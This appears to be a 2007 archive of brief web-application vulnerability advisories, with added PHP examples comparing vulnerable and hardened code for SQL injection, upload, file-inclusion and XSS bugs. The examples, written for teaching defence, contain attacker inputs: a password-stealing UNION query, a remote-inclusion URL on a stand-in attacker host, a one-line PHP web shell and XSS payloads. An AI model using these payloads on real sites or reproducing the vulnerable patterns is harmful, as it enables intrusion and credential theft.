Archive for September, 2007

Joomla Joomla!12Pictures Component File Inclusion

Application: Joomla
Affected Version: Joomla!12Pictures 1.x
Vendor’s URL: Component download page
Bug Type: File Inclusion
Risk Level: High

Solution:
Edit the source code or look for a patch file.

Joomla Joomla!FlashFun Component File Inclusion

Application: Joomla
Affected Version: Joomla!FlashFun 1.x
Vendor’s URL: Joomla!FlashFun Homepage
Bug Type: File Inclusion
Risk Level: High

Solution:
Edit the source code and contact the component developer.

phpBB Styles Demo Module Multiple Vulnerabilities

Application: phpBB
Affected Version: Styles Demo Module 1.x
Vendor’s URL: phpBB Homepage
Bug Type: SQL Injection & Cross Site Scripting
Risk Level: Critical

Solution:
Edit the source code and contact the developer.

Joomla Nice Talk Component “tagid” SQL Injection

Application: Joomla
Affected Version: Nice Talk 0.x
Vendor’s URL: Nice Talk Homepage
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code and ensure the input is sanitised.

Joomla NeoRecruit Component SQL Injection

Application: Joomla
Affected Version: NeoRecruit 1.x
Vendor’s URL: NeoRecruit download page
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Update to version 1.4.1.
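The SQL injection entries above (phpBB Styles Demo, Nice Talk "tagid", NeoRecruit) all come down to a request parameter reaching a query as SQL text. The block below is an added illustration of the vulnerable shape and two fixes; it is not code from any of those projects, and the table, column and function names are assumptions made for the example.

```php
<?php
// Added illustration, not code from Nice Talk, NeoRecruit or phpBB.
// Table and column names (jos_nicetalk, jos_users) are assumptions.

// Constructed attacker input, as it would arrive in ?tagid=...
$_GET['tagid'] = "1 UNION SELECT username, password FROM jos_users";

// Vulnerable shape: the request value is concatenated straight into the query.
// magic_quotes_gpc does not help here, because no quote character is needed
// to break out of a numeric comparison.
function queryVulnerable(array $request): string
{
    $tagid = $request['tagid'] ?? '';
    return "SELECT id, title FROM jos_nicetalk WHERE tagid = $tagid";
}

// Hardened shape for numeric parameters: cast before use. A value that is not
// a number becomes 0 (or its leading digits), and the injected SQL disappears.
function queryIntCast(array $request): string
{
    $tagid = (int) ($request['tagid'] ?? 0);
    return "SELECT id, title FROM jos_nicetalk WHERE tagid = $tagid";
}

// Hardened shape for any parameter type: a prepared statement sends the value
// separately from the SQL text, so the server never parses it as SQL.
function fetchByTag(mysqli $db, $tagid): array
{
    $stmt = $db->prepare("SELECT id, title FROM jos_nicetalk WHERE tagid = ?");
    $stmt->bind_param('i', $tagid);   // 'i': bound as an integer
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

echo queryVulnerable($_GET), "\n";
echo queryIntCast($_GET), "\n";
```

Run from the command line, the first echo shows the UNION appended to the query and the second shows only `tagid = 1`. The cast is the right fix for an id that is always numeric; for string parameters (search terms, names) use the prepared statement, not manual quoting, since escaping rules differ per database and charset.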

MediaWiki XSS

Application: MediaWiki
Affected Version:
MediaWiki 1.11 <= 1.11.0rc1
MediaWiki 1.10 <= 1.10.1
MediaWiki 1.9 <= 1.9.3
MediaWiki 1.8 <= 1.8.4 (if $wgEnableAPI has been switched on)
Vendor’s URL: MediaWiki HomePage
Bug Type: Cross Site Scripting
Risk Level: Medium

Solution:
Update to version 1.11.0, 1.10.2, 1.9.4, or 1.8.5.

Joomla Restaurante Component File Upload Vulnerability

Application: Joomla
Affected Version: Restaurante 1.x
Vendor’s URL: Restaurante download page
Bug Type: Arbitrary file upload leading to script execution
Risk Level: High

Solution:
Update to the latest version.
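An upload bug like the Restaurante entry turns into code execution when the server stores a client-chosen file name, such as `shell.php`, somewhere under the web root. The block below is an added illustration of the checks an upload handler should make before storing anything; it is not Restaurante code, and the allow-list, directory and function names are assumptions for the example.

```php
<?php
// Added illustration, not code from the Restaurante component.
// Allowed extensions and the MIME type each one must actually contain (assumption).
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Decide whether an uploaded file may be stored, and under what name.
// $clientName is $_FILES['f']['name'], $tmpPath is $_FILES['f']['tmp_name'].
function validateUpload(string $clientName, string $tmpPath): array
{
    // 1. Extension allow-list. Only the last extension counts, and it must be
    //    on the list, so shell.php and shell.phtml are rejected outright.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return ['ok' => false, 'reason' => "extension '$ext' not allowed"];
    }

    // 2. Content check on the bytes themselves. $_FILES['f']['type'] is sent
    //    by the client and must be ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        return ['ok' => false, 'reason' => "content is $mime, not " . ALLOWED[$ext]];
    }

    // 3. Never keep the client's name. A random name with the vetted extension
    //    defeats shell.php.jpg tricks on servers that honour multiple extensions.
    return ['ok' => true, 'name' => bin2hex(random_bytes(8)) . '.' . $ext];
}

// In a real handler: also require is_uploaded_file($tmpPath), then
// move_uploaded_file($tmpPath, $storeDir . '/' . $name) into a directory that
// is outside the web root or has script execution disabled.

// Constructed samples: a minimal PNG, and a PHP script renamed to .jpg.
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"
    . "\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00");
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php system(\$_GET['c']); ?>");

var_dump(validateUpload('photo.png', $png));
var_dump(validateUpload('photo.jpg', $php));   // rejected: content is text/x-php
var_dump(validateUpload('shell.php', $php));   // rejected: extension
unlink($png);
unlink($php);
```

Each of the three checks closes a different bypass: the allow-list stops obvious script extensions, the content check stops a script carrying an allowed extension, and the generated name stops double-extension and path tricks. Storing uploads where PHP is not executed is the backstop if all three are later weakened.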

WordPress Multiple Vulnerabilities

Application: WordPress
Affected Version: WordPress 2.x & WordPress MU 1.x
Vendor’s URL: WordPress HomePage
Bug Type: Script Insertion and SQL Injection
Risk Level: Critical

Solution:
Update to WordPress version 2.2.3 & WordPress MU version 1.2.5a.

Invision Power Board Multiple Vulnerabilities

Application: Invision Power Board
Affected Version: 2.x
Vendor’s URL: Invision Power Board HomePage
Bug Type: Security Bypass & Cross Site Scripting
Risk Level: Medium

Solution:
Download the latest version, or apply the vendor's patch following the instructions provided with it.

Joomla Joomlaradio Component File Inclusion

Application: Joomla
Affected Version: Joomlaradio 5.x; other versions may also be affected
Vendor’s URL: Joomlaradio download page
Bug Type: File Inclusion
Risk Level: Critical

Solution:
Edit the source code or consult the vendor.
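Three entries on this page (Joomla!12Pictures, Joomla!FlashFun, Joomlaradio) are file inclusion bugs in Joomla components. The block below is an added illustration of the shape such bugs commonly took in PHP code of that era and of the corresponding fix; it is not code from any of those components, the page does not say which pattern each of them had, and the component name, task names and file names are assumptions.

```php
<?php
// Added illustration, not code from Joomla!12Pictures, Joomla!FlashFun or Joomlaradio.
// com_example, its task names and file names are assumptions.

// Constructed attacker request. With register_globals=On, a request variable
// named like a configuration global silently becomes that global if the
// script never assigned it first.
$_GET['mosConfig_absolute_path'] = 'http://attacker.example/shell.txt?';
$_GET['task'] = '../../configuration';

// Vulnerable shape: both the include prefix and the file name come from the
// request. A remote prefix ending in '?' turns the rest of the path into a
// query string, so PHP fetches and runs the attacker's file (remote file
// inclusion); a traversal in $task reaches local files such as configuration.php.
function includePathVulnerable(array $request): string
{
    $mosConfig_absolute_path = $request['mosConfig_absolute_path'] ?? '/var/www/joomla';
    $task = $request['task'] ?? 'list';
    return $mosConfig_absolute_path . '/components/com_example/' . $task . '.php';
}

// Hardened shape: the prefix is fixed in code, the request only selects a key
// from an allow-list, and the file refuses to run outside the CMS (Joomla 1.0's
// guard line is shown in the comment).
function includePathHardened(array $request): ?string
{
    // defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
    static $allowed = ['list' => 'list.php', 'show' => 'show.php'];
    $task = $request['task'] ?? 'list';
    if (!isset($allowed[$task])) {
        return null;   // unknown task: nothing is included
    }
    return __DIR__ . '/components/com_example/' . $allowed[$task];
}

var_dump(includePathVulnerable($_GET));          // attacker URL followed by the local path
var_dump(includePathHardened($_GET));            // NULL: traversal string is not a known task
var_dump(includePathHardened(['task' => 'show'])); // fixed path under this directory
```

The allow-list removes the need to sanitise the path at all: the request never contributes characters to it. Independently of the component, `register_globals=Off` removes the root cause, and `allow_url_fopen=Off` plus `allow_url_include=Off` (PHP 5.2 and later) stop `include()` from fetching remote URLs even when the prefix is attacker-controlled.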

TinyWebGallery Multiple URL XSS

Application: TinyWebGallery
Affected Version: 1.6.3.4; other versions may also be affected
Vendor’s URL: TinyWebGallery HomePage
Bug Type: Cross Site Scripting (remote)
Risk Level: Medium

Solution:
Edit the source code or consult the application developer.

Coppermine XSS and Local File Inclusion

Application: Coppermine
Affected Version: 1.4.12 and prior versions
Vendor’s URL: http://coppermine-gallery.net/
Bug Type: Cross Site Scripting & Exposure of system information
Risk Level: Medium

Solution:
Update to version 1.4.13.

Mambo Component AkoBook Script Insertion

Application: Mambo
Affected Version: 3.42
Vendor’s URL: http://www.mamboportal.com/
Bug Type: Script Insertion
Risk Level: Medium

Solution:
Edit the component source code or contact the developer for the latest update.
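The cross site scripting and script insertion entries on this page (phpBB Styles Demo, MediaWiki, Invision Power Board, TinyWebGallery, Coppermine, and this AkoBook guestbook) share one root cause: user-supplied text written into a page without encoding for the context it lands in. The block below is an added illustration using a hypothetical guestbook entry; it is not code from AkoBook or any other listed project, and the field names are assumptions.

```php
<?php
// Added illustration, not code from AkoBook or any other listed project.
// A guestbook entry with three fields (assumption) as an attacker might submit it.
$entry = [
    'name' => '<script>alert(document.cookie)</script>',
    'url'  => 'javascript:alert(1)',
    'text' => '" onmouseover="alert(1)',
];

// Vulnerable rendering: raw values dropped into HTML text and attributes.
function renderVulnerable(array $e): string
{
    return '<a href="' . $e['url'] . '">' . $e['name'] . '</a>'
         . '<p title="' . $e['text'] . '">' . $e['text'] . '</p>';
}

// Encode for HTML text and for double-quoted attributes. ENT_QUOTES also
// covers single-quoted attributes; ENT_SUBSTITUTE keeps invalid UTF-8 from
// silently emptying the output; the charset must match the page's.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encoding alone does not fix href: "javascript:" is harmless to
// htmlspecialchars but still runs. Allow only http and https schemes.
function safeUrl(string $url): string
{
    $scheme = strtolower(parse_url($url, PHP_URL_SCHEME) ?? '');
    return in_array($scheme, ['http', 'https'], true) ? $url : '#';
}

// Hardened rendering: every value is validated or encoded for where it goes.
function renderHardened(array $e): string
{
    return '<a href="' . e(safeUrl($e['url'])) . '">' . e($e['name']) . '</a>'
         . '<p title="' . e($e['text']) . '">' . e($e['text']) . '</p>';
}

echo renderVulnerable($entry), "\n";
echo renderHardened($entry), "\n";
```

The vulnerable output contains a live script tag, an attribute break-out and a javascript: link; the hardened output renders all three as visible text. Stripping tags on input is not a substitute: it misses attribute and URL contexts, and it destroys legitimate text containing `<`. Encode at output, per context, every time.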